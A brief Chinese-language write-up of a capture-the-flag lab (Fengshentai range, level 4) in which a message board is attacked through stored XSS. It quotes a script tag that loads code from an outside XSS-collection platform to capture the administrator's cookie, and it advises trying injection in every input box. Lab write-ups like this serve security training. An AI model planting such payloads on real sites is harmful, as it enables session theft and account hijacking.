mbp 封神台靶场 四 (笔记)
打开链接,发现是个留言板,尝试xss注入,看看是否可行。弹出1提示并发现字段变灰,说明注入成功,登录xss平台创建项目。
将此代码段植入刚才的区域中
<script src=http://xsspt.com/2gVqle></script>
然后查看项目内容发现flag总结:本关主要是通过xss注入拿到管理员cookie的,见框就插是xss注入的常用手段,它主要通过用户输入当作html语句在页面上执行,分为反射型xss和存储型xss,这次用到的是后者。xss平台可以自己搭建或者登录xsspt使用。